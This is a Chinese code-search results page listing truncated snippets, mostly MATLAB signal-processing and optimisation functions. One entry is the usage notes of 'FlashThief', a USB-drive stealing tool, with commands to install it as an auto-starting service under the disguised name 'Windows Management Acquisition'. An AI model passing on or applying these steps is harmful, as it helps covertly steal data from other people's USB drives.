代码搜索:INTERVAL
找到约 8,094 项符合「INTERVAL」的源代码
代码结果 8,094
www.eeworm.com/read/279419/10439353
m denoising.m
%主程序
%____模极大值法去噪:
%二进制小波变换(离散平稳小波变换)并找到模极大序列,对极大值序列处理后重建信号;
%参数c, O_d4, O_d3可以调节。
%function Denoise_w_Mod_sim_1(snr,aaa)
%close all;
%clc;
clear;
snr=5;
init=2055615866;
[xref,xn]=wnoise(1,
www.eeworm.com/read/161189/10439907
m gssearch.m
%
%
%
% [xmin,fxmin,newa,newb]=gssearch('f',a,u,b,tol)
%
%
%
%
function [xmin,fxmin,newa,newb]=gssearch(fun,a,u,b,tol)
%
% Evaluate f at the end points of the interval, and initialize
% xmin.
%
newa
www.eeworm.com/read/161189/10440102
m gssearch.m
%
%
%
% [xmin,fxmin,newa,newb]=gssearch('f',a,u,b,tol)
%
%
%
%
function [xmin,fxmin,newa,newb]=gssearch(fun,a,u,b,tol)
%
% Evaluate f at the end points of the interval, and initialize
% xmin.
%
newa
www.eeworm.com/read/424116/10491213
m plspress.m
function plspress(Model,interval)
% plspress plots PRESS as a function of the number of PLS components
%
% Input:
% Model (the output from ipls.m or plsmodel.m)
% interval is optional for s
www.eeworm.com/read/424116/10491217
m plsrmse.m
function plsrmse(Model,interval)
% plsrmse plots RMSECV/RMSEP/RMSEC as a function of the number of PLS components
%
% Input:
% Model (the output from ipls.m)
% interval is optional for sele
www.eeworm.com/read/424106/10492049
txt 使用说明.txt
FlashThief U盘小偷
本程序以服务形式运行。当然,双击它也是开始监听了……
安装服务:FlashThief.exe -install
卸载服务:FlashThief.exe -uninstall
安装服务后,默认启动方式为自动启动。你要安装后就运行,请使用
net start "Windows Management Acquisition"
www.eeworm.com/read/424063/10499283
m loweq.m
function xl=loweq(x,ts,f0)
% xl=loweq(x,ts,f0)
%LOWEQ Returns the lowpass equivalent of the signal x.
% f0 is the center frequency.
% ts is the sampling interval.
%
t=[0:ts:ts*(length(x)-1
www.eeworm.com/read/424063/10500108
m loweq.m
function xl=loweq(x,ts,f0)
% xl=loweq(x,ts,f0)
%LOWEQ Returns the lowpass equivalent of the signal x.
% f0 is the center frequency.
% ts is the sampling interval.
%
t=[0:ts:ts*(length(x)-1
www.eeworm.com/read/423536/10552903
m loweq.m
function xl=loweq(x,ts,f0)
% xl=loweq(x,ts,f0)
%LOWEQ Returns the lowpass equivalent of the signal x.
% f0 is the center frequency.
% ts is the sampling interval.
%
t=[0:ts:ts*(length(x)-1